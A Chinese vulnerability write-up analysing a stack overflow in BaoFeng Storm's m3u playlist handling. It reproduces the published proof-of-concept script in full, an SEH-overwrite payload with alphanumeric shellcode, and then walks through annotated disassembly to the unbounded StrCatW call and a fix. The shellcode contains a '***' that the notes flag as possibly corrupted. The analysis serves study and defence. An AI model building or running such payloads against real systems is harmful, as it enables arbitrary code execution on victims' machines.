题目:简单分析暴风影音读取m3u格式文件漏洞 作者联系: 作者:仙果 备注:保留版权,欢迎转载,转载请注明出处。 0x1.题记 0x2.测试环境 0x3.分析过程 0x4.修复方法 0x5.总结 0x1.题记 某日惊见www.exploit-db网站上公布一则暴风影音的漏洞(EDB-ID 12516,CNVD-2010-00752),是读取m3u格式文件时的栈缓冲区溢出漏洞,立即把POC下载下来测试之,发现对应版本也有效,对应版本弹出计算器。ShellCode经过了处理,为纯字母的ShellCode,相当的劲爆啊。因有工作上的其他事情,没有当即进行分析,留到了今天把漏洞的原理进行了分析,不敢独享,特来分享。文中难免有错漏之处,希望大家莫要介意,毕竟作者乃是半路出家,实属不易,还是属于菜鸟一类,欢迎大家批评指正。 0x2.测试环境 2.1 windows xp sp3_cn (实体机测试,没有使用虚拟机) 2.2 Storm 2012_3.10.4.8_Cn 2.3 010editor windbg IDA5.5 0x3.分析过程 3.1 Poc代码 (来源: https://www.exploit-db.com/exploits/12516 ;注意下面的偏移只对PoC头部列出的版本有效,且依赖m3u所在目录前缀的长度,见PoC中的"Test"说明)
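#!/usr/bin/env python
#################################################################
#
# Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit
# CNVD-ID: CNVD-2010-00752
# Author: Lufeng Li and Qingshan Li of Neusoft Corporation
# Download: www.baofeng.com
# Test: Put m3u file in root(e.g. c:/ d:/),and open this m3u file
# Platform: Windows XPSP3 Chinese Simplified
# Vulnerable: Storm2012 3.10.4.21
#             Storm2012 3.10.4.16
#             Storm2012 3.10.4.8
#             Storm2012 3.10.3.17
#             Storm2012 3.10.2.5
#             Storm2012 3.10.1.12
#################################################################
# Code :
"""Proof-of-concept .m3u for the BaoFeng Storm playlist stack overflow
(CNVD-2010-00752, exploit-db 12516).

What the file exercises (per the MediaLib.dll disassembly in this write-up):
the player copies the playlist's directory into a fixed-size stack buffer
with StrCpyNW and then appends each playlist entry with an unbounded
StrCatW.  An over-long entry runs past the frame; the nseh/seh fields
below show that the PoC targets the SEH record.

Review notes:
* The payload is written as bytes in binary mode.  The published script
  wrote a text-mode str: under Python 3 that re-encodes the 0x80-0xFF bytes
  in nseh/seh/jmp as UTF-8 and corrupts the file, and Windows text mode
  would translate a 0x0A byte if one were ever present.  Python 2 output
  is byte-for-byte unchanged.
* The offsets are for the listed builds only, and they depend on the
  directory prefix copied in front of the entry -- presumably why the
  original requires the file to sit in a drive root (c:\\, d:\\).
* nseh/seh are 3-byte sequences; the disassembly converts the entry to
  Unicode before the overflow, so these look like GBK multibyte characters
  chosen for their UTF-16 values.  That is an inference from the PoC, not
  verified here.
* The "***" inside the shellcode is reproduced exactly as found on this
  page; it is not alphanumeric-encoder output and may be a scrape artefact.
  Diff against the exploit-db entry before relying on it.

Only run this against a system you own.  Executing the script writes
baofeng.m3u into the current directory.
"""

outfile = "baofeng.m3u"

junk = b"\x41" * 795                      # filler up to the SEH record
nseh = b"\x61\xe8\xe1"                    # next-SEH pointer (overwritten)
seh = b"\xaa\xd7\x40"                     # handler address (overwritten)
jmp = (b"\x53\x53\x6d\x58\x6d\x05\x11\x22"
       b"\x6d\x2d\x10\x22\x6d\xac\xe4")   # stage-1 stub, as published
nops = b"\x42" * 110                      # slide into the alphanumeric shellcode
shellcode = (
    b"PPYAIAIAIAIAQATAXAZAPA3QADAZA"
    b"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"
    b"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"
    b"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"
    b"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"
    b"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"
    b"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"
    b"NQKONQ90***Q8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"
    b"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"
    b"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"
    b"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"
    b"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
    b"QQ2LRCM0LJA"
)


def build_payload():
    """Return the complete file body as bytes: junk+nseh+seh+jmp+nops+shellcode."""
    return junk + nseh + seh + jmp + nops + shellcode


# Kept as a module-level name for parity with the published script.
payload = build_payload()


def write_poc(path=outfile):
    """Write the payload to ``path`` in binary mode.

    Args:
        path: destination file name; defaults to ``baofeng.m3u`` in the
            current directory, as in the original.
    Returns:
        Number of bytes written (the payload length).
    """
    data = build_payload()
    # Binary mode: no newline translation, no text-codec re-encoding of the
    # high bytes in nseh/seh/jmp.  The context manager closes the handle
    # even if the write fails.
    with open(path, "wb") as fobj:
        fobj.write(data)
    return len(data)


if __name__ == "__main__":
    write_poc()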
.text:10004052 ; =============== S U B R O U T I N E =======================================
.text:10004052
.text:10004052 ; Attributes: bp-based frame
.text:10004052
.text:10004052 ; int __cdecl sub_10004052(LPCWSTR lpFileName)
; Content sniff on the first 0x400 bytes of lpFileName.
; Returns 0 (eax) when CreateFileW fails, when ReadFile fails, or when a NUL
; byte is found among the bytes actually read (loop at loc_1000412A);
; otherwise returns 1 (esi, set at 1000406B and cleared only at loc_1000413B).
; Two short compare loops at 100040CA / 100040DF match a 3-byte and a 2-byte
; signature held on the stack; the values are stored in code elided from this
; listing, and the path taken when both match (after 100040F2) is elided too.
; The author reads them as an encoding (UTF-8) check -- plausible from the
; lengths (a UTF-8 BOM is 3 bytes, a UTF-16 BOM is 2), but not confirmed here.
; The 0x400-byte read is bounded and fits Buffer; this is not the overflow.
.text:10004052 sub_10004052 proc near ; CODE XREF: sub_10003FCB+32p
.text:10004052
.text:10004052 Buffer = byte ptr -40Ch
.text:10004052 NumberOfBytesRead= dword ptr -0Ch
.text:10004052 var_8 = byte ptr -8
.text:10004052 var_7 = byte ptr -7
.text:10004052 var_6 = byte ptr -6
.text:10004052 var_2 = byte ptr -2
.text:10004052 var_1 = byte ptr -1
.text:10004052 lpFileName = dword ptr 8
.text:10004052
.text:10004052 push ebp
.text:10004053 mov ebp, esp
.text:10004055 sub esp, 40Ch ; frame: 0x400-byte Buffer plus the locals above
.text:1000405B push ebx
.text:1000405C push esi
.text:1000405D xor ebx, ebx ; ebx = 0, reused as NULL / FALSE below
.text:1000405F push edi
.text:10004060 push ebx ; hTemplateFile
.text:10004061 push 80h ; dwFlagsAndAttributes (FILE_ATTRIBUTE_NORMAL)
.text:10004066 push 3 ; dwCreationDisposition (OPEN_EXISTING)
.text:10004068 push ebx ; lpSecurityAttributes
.text:10004069 push 1
.text:1000406B pop esi ; esi = 1: the default return value
.text:1000406C push esi ; dwShareMode (FILE_SHARE_READ)
.text:1000406D push 80000000h ; dwDesiredAccess (GENERIC_READ)
.text:10004072 push [ebp+lpFileName] ; lpFileName
.text:10004075 call ds:CreateFileW ; open the playlist file read-only
.text:1000407B mov edi, eax ; edi = file handle
.text:1000407D cmp edi, 0FFFFFFFFh ; INVALID_HANDLE_VALUE?
.text:10004080 jnz short loc_10004089
.text:10004082 xor eax, eax ; open failed: return 0
.text:10004084 jmp loc_10004146
.text:10004089 ; ---------------------------------------------------------------------------
.text:10004089
.text:10004089 loc_10004089: ; CODE XREF: sub_10004052+2Ej
.text:10004089 lea eax, [ebp+NumberOfBytesRead]
.text:1000408C push ebx ; lpOverlapped
.text:1000408D push eax ; lpNumberOfBytesRead
.text:1000408E lea eax, [ebp+Buffer]
.text:10004094 push 400h ; nNumberOfBytesToRead (== sizeof Buffer, bounded)
.text:10004099 push eax ; lpBuffer -- the bytes read land in Buffer on this frame
.text:1000409A push edi ; hFile
.text:1000409B mov [ebp+NumberOfBytesRead], ebx
.text:1000409E call ds:ReadFile ; read up to 0x400 bytes of the file
.text:100040A4 test eax, eax
.text:100040A6 jz loc_1000413B ; read failed: return 0
.text:100040CA mov cl, [ebp+eax+Buffer] ; Buffer[eax], eax = 0..2
.text:100040D1 cmp cl, [ebp+eax+var_8] ; 3-byte signature in var_8..var_6 (set outside this excerpt)
.text:100040D5 jnz short loc_10004123 ; mismatch: fall through to the NUL scan
.text:100040D7 inc eax
.text:100040D8 cmp eax, 3
.text:100040DB jb short loc_100040CA
.text:100040DD xor eax, eax
.text:100040DF loc_100040DF: ; CODE XREF: sub_10004052+9Ej
.text:100040DF mov cl, [ebp+eax+Buffer] ; Buffer[eax], eax = 0..1 -- first two bytes of the file
.text:100040E6 cmp cl, byte ptr [ebp+eax+lpFileName+2] ; author: UTF-8 check. NOTE(review): this reads 2 bytes at ebp+0Ah, which IDA labels as part of the lpFileName argument slot -- odd for a signature; confirm in the idb what is stored there
.text:100040EA jnz short loc_10004123 ; mismatch: go to the NUL scan at loc_10004123
.text:100040EC inc eax
.text:100040ED cmp eax, 2
.text:100040F0 jb short loc_100040DF
.text:100040F2 xor eax, eax ; both signatures matched -- continuation elided below
..................................................................................
.text:10004123 ; ---------------------------------------------------------------------------
.text:10004123
.text:10004123 loc_10004123: ; CODE XREF: sub_10004052+83j
.text:10004123 ; sub_10004052+98j ...
.text:10004123 xor eax, eax
.text:10004125 cmp [ebp+NumberOfBytesRead], ebx ; zero bytes read?
.text:10004128 jbe short loc_1000413D ; empty file: keep esi = 1
.text:1000412A
.text:1000412A loc_1000412A: ; CODE XREF: sub_10004052+E5j
.text:1000412A cmp [ebp+eax+Buffer], bl ; NUL byte in the data read?
.text:10004131 jz short loc_1000413B ; yes: treat as not-text, return 0
.text:10004133 inc eax
.text:10004134 cmp eax, [ebp+NumberOfBytesRead] ; bounded by the bytes actually read
.text:10004137 jb short loc_1000412A
.text:10004139 jmp short loc_1000413D
.text:1000413B ; ---------------------------------------------------------------------------
.text:1000413B
.text:1000413B loc_1000413B: ; CODE XREF: sub_10004052+54j
.text:1000413B ; sub_10004052+C6j ...
.text:1000413B xor esi, esi ; return value = 0
.text:1000413D
.text:1000413D loc_1000413D: ; CODE XREF: sub_10004052+BCj
.text:1000413D ; sub_10004052+CFj ...
.text:1000413D push edi ; hObject -- the handle from CreateFileW (the original note here about eax=0x400 does not match this line; eax is the scan index at this point)
.text:1000413E call ds:CloseHandle ; close the file handle
.text:10004144 mov eax, esi ; eax = 1 unless cleared at loc_1000413B
.text:10004146
.text:10004146 loc_10004146: ; CODE XREF: sub_10004052+32j
.text:10004146 pop edi
.text:10004147 pop esi
.text:10004148 pop ebx
.text:10004149 leave
.text:1000414A retn
.text:1000414A sub_10004052 endp ; end of sub_10004052
; Tail of sub_10003FCB (its entry and the loop head loc_10003FE4 are not in
; this excerpt).  Visible behaviour: call sub_10004052 on lpFileName; a
; non-zero result returns 1 immediately (loc_10004018).  Otherwise esi is
; advanced by 4 and the loop repeats until esi reaches offset a_smpl, then
; the function returns 0.  esi therefore walks a 4-byte-stride table that
; ends just before the ".smpl" string -- presumably a table of pointers
; consulted by the elided loop body; confirm in the idb.
.text:10003FFC push ebx ; lpFileName
.text:10003FFD call sub_10004052 ; content sniff of the file (see sub_10004052 above)
.text:10004002 test eax, eax
.text:10004004 pop ecx ; discard the __cdecl argument
.text:10004005 jnz short loc_10004018 ; sniff accepted the file -> return 1
.text:10004007
.text:10004007 loc_10004007: ; CODE XREF: sub_10003FCB+24j
.text:10004007 add esi, 4 ; next table entry
.text:1000400A cmp esi, offset a_smpl ; ".smpl" -- end of the table
.text:10004010 jb short loc_10003FE4 ; loop head is outside this excerpt
.text:10004012
.text:10004012 loc_10004012: ; CODE XREF: sub_10003FCB+9j
.text:10004012 xor eax, eax ; table exhausted: return 0
.text:10004014
.text:10004014 loc_10004014: ; CODE XREF: sub_10003FCB+50j
.text:10004014 pop edi
.text:10004015 pop esi
.text:10004016 pop ebx
.text:10004017 retn ; return eax
.text:10004018 ; ---------------------------------------------------------------------------
.text:10004018
.text:10004018 loc_10004018: ; CODE XREF: sub_10003FCB+2Fj
.text:10004018 ; sub_10003FCB+3Aj
.text:10004018 push 1
.text:1000401A pop eax ; return 1
.text:1000401B jmp short loc_10004014
.text:1000401B sub_10003FCB endp
; Excerpts of sub_10005F7F (entry, several branches and the epilogue are
; elided).  This is where the overflow is: the playlist's directory is copied
; into the stack buffer var_648 with a bounded StrCpyNW (0x208 wide chars),
; and each playlist entry ([esi+0Ch]) is then appended with StrCatW, which
; has no length bound.  ebx holds the playlist file name (pushed as
; lpFileName at 10005FC2); edi holds the extension being compared.
.text:10005FC2 push ebx ; lpFileName
.text:10005FC3 mov edi, eax
.text:10005FC5 call sub_10003FCB ; file-type check described above (sub_10003FCB)
.text:10005FCA test eax, eax
.text:10005FCC pop ecx
.text:10005FCD jz loc_100062B1 ; rejected: bail out (target elided)
.text:10005FD3 mov al, byte ptr [ebp+arg_4+3]
.text:10005FD6 push esi
.text:10005FD7 push esi
.text:10005FD8 lea ecx, [ebp+pcchPath]
.text:10005FDB mov byte ptr [ebp+pcchPath], al
.text:10005FDE call sub_10002B49 ; thiscall on pcchPath; result is kept in var_14 and walked at loc_10006198 -- looks like the entry-list object (inference)
.text:10005FE3 mov [ebp+var_14], eax
.text:10005FE6 mov [ebp+var_10], esi
.text:10005FE9 mov [ebp+var_4], esi
.text:10005FEC mov esi, ds:StrCmpIW ; esi = StrCmpIW for the extension dispatch below
.text:10005FF2 push offset a_wax ; ".wax"
.text:10005FF7 push edi
.text:10005FF8 call esi ; StrCmpIW
.text:10005FFA test eax, eax
.text:10005FFC jz loc_100060E0
.text:10006002 push offset a_asx ; ".asx" (the comparison and the other extensions are elided)
.text:1000604D loc_1000604D: ; CODE XREF: sub_10005F7F+BDj
.text:1000604D push offset a_m3u ; ".m3u" -- the branch taken for the PoC file
.text:10006052 push edi
.text:10006053 call esi ; StrCmpIW
.text:10006055 test eax, eax
.text:10006057 jnz short loc_10006068 ; not .m3u: try the next extension
.text:10006059 lea eax, [ebp+pcchPath]
.text:1000605C push eax ; int
.text:1000605D push ebx ; File
.text:1000605E call sub_1000696C ; author: parses the playlist body into memory as Unicode entries (not shown here -- the entry strings read at [esi+0Ch] below are consistent with that; verify in the idb)
.text:10006063 jmp loc_1000610A
.........................................
text:1000610A loc_1000610A: ; CODE XREF: sub_10005F7F+C9j
.text:1000610A ; sub_10005F7F+E4j ...
.text:1000610A pop ecx
.text:1000610B test eax, eax
.text:1000610D pop ecx
.text:1000610E jnz short loc_10006117 ; parse succeeded
.......................
text:10006117 ; ---------------------------------------------------------------------------
.text:10006117
.text:10006117 loc_10006117: ; CODE XREF: sub_10005F7F+16Fj
.text:10006117 ; sub_10005F7F+17Fj ...
.text:10006117 mov edi, ds:StrCpyNW ; edi = StrCpyNW from here on
.text:1000611D push 823h ; cchMax = 0x823 = 2083 (INTERNET_MAX_URL_LENGTH)
.text:10006122 lea eax, [ebp+pszPath]
.text:10006128 push ebx ; pszSrc = playlist file name
.text:10006129 push eax ; pszDst = pszPath
.text:1000612A call edi ; StrCpyNW -- bounded copy of the playlist path into pszPath
.text:1000612C lea eax, [ebp+pszPath]
.text:10006132 xor ebx, ebx ; ebx = 0 from here on
.text:10006134 push eax ; pszPath
.text:10006135 mov [ebp+lpFileName], ebx
.text:10006138 call ds:PathIsURLW
.text:1000613E test eax, eax
.text:10006140 jz short loc_10006164 ; local file: strip to its directory
........................................
.text:10006164 ; ---------------------------------------------------------------------------
.text:10006164
.text:10006164 loc_10006164: ; CODE XREF: sub_10005F7F+1C1j
.text:10006164 lea eax, [ebp+pszPath]
.text:1000616A push eax ; pszPath
.text:1000616B call ds:PathRemoveFileSpecW ; pszPath = directory of the playlist
.text:10006171 lea eax, [ebp+pszPath]
.text:10006177 push eax ; pszPath
.text:10006178 call ds:PathAddBackslashW ; ... with a trailing backslash; this is the prefix every relative entry gets
.text:1000617E
.text:1000617E loc_1000617E: ; CODE XREF: sub_10005F7F+1E3j
.text:1000617E cmp [ebp+var_10], ebx
.text:10006181 jnz short loc_10006198
..............................
.text:10006198 ; ---------------------------------------------------------------------------
.text:10006198
.text:10006198 loc_10006198: ; CODE XREF: sub_10005F7F+202j
.text:10006198 mov eax, [ebp+var_14] ; list object from sub_10002B49
.text:1000619B mov esi, [eax] ; first node
.text:1000619D cmp esi, eax ; first node == head -> empty list (sentinel-headed list, inference)
.text:1000619F jz loc_100062A1
.text:100061A5
.text:100061A5 loc_100061A5: ; CODE XREF: sub_10005F7F+31Cj
.text:100061A5 cmp [ebp+lpFileName], ebx
.text:100061A8 jnz loc_10006259
.text:100061AE mov eax, [esi+0Ch] ; eax = this entry's string -- author: the Unicode-converted playlist line (attacker-controlled length)
.text:100061B1 cmp eax, ebx
.text:100061B3 jnz short loc_100061BA
......................................
.text:100061BA
.text:100061BA loc_100061BA: ; CODE XREF: sub_10005F7F+234j
.text:100061BA push eax ; pszPath
.text:100061BB call ds:PathIsURLW
.text:100061C1 test eax, eax
.text:100061C3 jnz short loc_100061F6 ; URL entries take another path (elided)
.text:100061C5 lea eax, [ebp+pszPath]
.text:100061CB push 208h ; cchMax = 0x208 = 520 wide chars (2 * MAX_PATH)
.text:100061D0 push eax ; pszSrc = playlist directory
.text:100061D1 lea eax, [ebp+var_648]
.text:100061D7 push eax ; pszDst = var_648, a fixed-size stack buffer
.text:100061D8 call edi ; StrCpyNW -- bounded: var_648 = "<dir>\"
.text:100061DA mov eax, [esi+0Ch] ; the entry string again
.text:100061DD cmp eax, ebx
.text:100061DF jnz short loc_100061E6
.............................
.text:100061E6
.text:100061E6 loc_100061E6: ; CODE XREF: sub_10005F7F+260j
.text:100061E6 push eax ; pszSrc = entry string, no length check anywhere above
.text:100061E7 lea eax, [ebp+var_648]
.text:100061ED push eax ; pszDst = var_648
.text:100061EE call ds:StrCatW ; THE BUG: unbounded append of the entry onto var_648. Anything longer than the remaining space runs past the frame; the PoC's nseh/seh fields show it reaches the SEH record, and since the directory prefix is copied first the offset shifts with the playlist's location (why the PoC wants a drive root). Remediation: a length-checked append (e.g. StringCchCatW with the remaining capacity of var_648) or reject over-long entries before this point.
.text:100061F4 jmp short loc_10006211
..................................................
.text:10006211
.text:10006211 loc_10006211: ; CODE XREF: sub_10005F7F+275j
.text:10006211 lea eax, [ebp+var_648]
.text:10006217 push eax ; pszPath -- the already-overflowed buffer
.text:10006218 lea eax, [ebp+psz]
.text:1000621E push eax ; pszBuf
.text:1000621F call ds:PathCanonicalizeW
.text:10006225 lea ecx, [ebp+var_30]
.text:10006228 call sub_10001DD7
.text:1000622D mov ecx, [ebp+arg_4]
.text:10006230 lea eax, [ebp+var_30]
.text:10006233 push eax
.text:10006234 mov byte ptr [ebp+var_4], 1
.text:10006238 call sub_10002680 ; author: the access violation occurs inside this call; with the SEH record already overwritten, the dispatch of that exception is what hands control to the PoC's handler address (inference from the PoC layout)
上传的附件: MediaLib.dll.idb.zip (910.28kb,63次下载) MediaLib.dll.zip (108.38kb,59次下载) 简单分析暴风影音读取m3u格式文件漏洞.zip (7.50kb,84次下载) baofeng.m3u.zip (0.50kb,70次下载) (说明:上文反汇编中 .text:1000xxxx 的地址与附件 MediaLib.dll 的默认基址 0x10000000 相符,推测分析对象即为该 DLL;以 idb 为准。)